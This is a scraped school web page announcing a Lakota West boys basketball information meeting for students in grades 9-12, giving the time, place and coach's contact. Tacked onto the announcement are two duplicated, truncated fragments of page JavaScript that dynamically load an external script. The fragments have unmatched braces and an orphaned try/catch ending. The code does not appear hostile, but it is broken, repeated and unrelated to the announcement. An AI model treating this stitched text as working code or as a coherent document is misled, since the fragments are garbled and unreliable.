Boys Basketball
Mark Your Calendars: Lakota West Boys Basketball Information Meeting!
There will be a Lakota West Boys Basketball information meeting for students currently in grades 9-12 who are interested in playing basketball. Athletes interested in playing this winter should attend this meeting and have a parent attend to get workout schedules and information about the upcoming season. The meeting will be on Thursday, September 23rd in the West Community Room starting at 7:00 PM. Please contact Coach Leon at jim.leon@lakotaonline.com for any additional information.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();